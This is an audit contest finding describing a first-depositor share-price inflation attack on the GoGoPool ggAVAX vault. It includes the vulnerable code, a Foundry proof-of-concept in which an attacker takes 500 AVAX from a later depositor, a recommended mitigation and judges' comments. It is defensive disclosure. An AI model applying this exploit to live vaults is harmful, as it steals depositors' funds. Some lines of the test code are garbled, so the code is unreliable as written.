code-423n4 / 2022-12-gogopool-findings

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Inflation of ggAVAX share price by first depositor #209

Open code423n4 opened 1 year ago

code423n4 commented 1 year ago

Lines of code

Vulnerability details


Inflation of ggAVAX share price can be done by depositing as soon as the vault is created.


  1. Early depositor will be able steal other depositors funds
  2. Exchange rate is inflated. As a result depositors are not able to deposit small funds.

Proof of Concept

If ggAVAX is not seeded as soon as it is created, a malicious depositor can deposit 1 WEI of AVAX to receive 1 share. The depositor can donate WAVAX to the vault and call syncRewards. This will start inflating the price.

When the attacker front-runs the creation of the vault, the attacker:

  1. Calls depositAVAX to receive 1 share
  2. Transfers WAVAX to ggAVAX
  3. Calls syncRewards to inflate exchange rate

The issue exists because the exchange rate is calculated as the ratio between the totalSupply of shares and the totalAssets(). When the attacker transfers WAVAX and calls syncRewards(), the totalAssets() increases gradually and therefore the exchange rate also increases.


    function convertToShares(uint256 assets) public view virtual returns (uint256) {
        uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.

        return supply == 0 ? assets : assets.mulDivDown(supply, totalAssets());

Its important to note that while it is true that cycle length is 14 days, in practice time between cycles can very between 0-14 days. This is because syncRewards validates that the next reward cycle is evenly divided by the length (14 days).


    function syncRewards() public {
        // Ensure nextRewardsCycleEnd will be evenly divisible by `rewardsCycleLength`.
        uint32 nextRewardsCycleEnd = ((timestamp + rewardsCycleLength) / rewardsCycleLength) * rewardsCycleLength;


Edge case example: syncRewards is called with the timestamp 1672876799, syncRewards will be able to be called again 1 second later. (1672876799 + 14 days) / 14 days) * 14 days) = 1672876800

Additionally, the price inflation causes a revert for users who want to deposit less then the donation (WAVAX transfer) amount, due to precision rounding when depositing.


    function depositAVAX() public payable returns (uint256 shares) {
        if ((shares = previewDeposit(assets)) == 0) {
            revert ZeroShares();

previewDeposit and convertToShares:

    function convertToShares(uint256 assets) public view virtual returns (uint256) {
        uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.

        return supply == 0 ? assets : assets.mulDivDown(supply, totalAssets());
    function previewDeposit(uint256 assets) public view virtual returns (uint256) {
        return convertToShares(assets);

Foundry POC

The POC will demonstrate the below scenario:

  1. Bob front-runs the vault creation.
  2. Bob deposits 1 WEI of AVAX to the vault.
  3. Bob transfers 1000 WAVAX to the vault.
  4. Bob calls syncRewards when block.timestamp = 1672876799.
  5. Bob waits 1 second.
  6. Bob calls syncRewards again. Share price fully inflated.
  7. Alice deposits 2000 AVAX to vault.
  8. Bob withdraws 1500 AVAX (steals 500 AVAX from Alice).
  9. Alice share earns her 1500 AVAX (although she deposited 2000).

Additionally, the POC will show that depositors trying to deposit less then the donation amount will revert.

Add the following test to TokenggAVAX.t.sol:

    function testShareInflation() public {
        uint256 depositAmount = 1;
        uint256 aliceDeposit = 2000 ether;
        uint256 donationAmount = 1000 ether;, donationAmount  + depositAmount);, aliceDeposit);

        // create new ggAVAX
        ggAVAXImpl = new TokenggAVAX();
        ggAVAX = TokenggAVAX(deployProxy(address(ggAVAXImpl), address(guardian)));
        ggAVAX.initialize(store, ERC20(address(wavax)));

        // Bob deposits 1 WEI of AVAX
        ggAVAX.depositAVAX{value: depositAmount}();
        // Bob transfers 1000 AVAX to vault
        wavax.deposit{value: donationAmount}();
        wavax.transfer(address(ggAVAX), donationAmount);
        // Bob Syncs rewards

        // 1 second has passed
        // This can range between 0-14 days. Every seconds, exchange rate rises
        skip(1 seconds);

        // Alice deposits 2000 AVAX
        ggAVAX.depositAVAX{value: aliceDeposit}();

        //Expectet revert when any depositor deposits less then 1000 AVAX
        ggAVAX.depositAVAX{value: 10 ether}();

        // Bob withdraws maximum assests for his share
        uint256 maxWithdrawAssets = ggAVAX.maxWithdraw(bob);

        //Validate bob has withdrawn 1500 AVAX 
        assertEq(bob.balance, 1500 ether);

        // Alice withdraws maximum assests for her share
        maxWithdrawAssets = ggAVAX.maxWithdraw(alice);
        ggAVAX.syncRewards(); // to update accounting

        // Validate that Alice withdraw 1500 AVAX + 1 (~500 AVAX loss)
        assertEq(alice.balance, 1500 ether + 1);

To run the POC, execute:

forge test -m testShareInflation -v

Expected output:

Running 1 test for test/unit/TokenggAVAX.t.sol:TokenggAVAXTest
[PASS] testShareInflation() (gas: 3874399)
Test result: ok. 1 passed; 0 failed; finished in 8.71s

Tools Used

VS Code, Foundry

Recommended Mitigation Steps

When creating the vault add initial funds in order to make it harder to inflate the price. Best practice would add initial funds as part of the initialization of the contract (to prevent front-running).

GalloDaSballo commented 1 year ago

Best POC overall

c4-judge commented 1 year ago

GalloDaSballo marked the issue as primary issue

c4-sponsor commented 1 year ago

emersoncloud marked the issue as sponsor confirmed

GalloDaSballo commented 1 year ago

The Warden has shown how, by performing a small deposit, followed by a transfer, shares can be rebased, causing a grief in the best case, and complete fund loss in the worst case for every subsequent depositor.

While the finding is fairly known, it's impact should not be understated, and because of this I agree with High Severity.

I recommend watching this presentation by Riley Holterhus which shows possible mitigations for the attack:

c4-judge commented 1 year ago

GalloDaSballo marked the issue as selected for report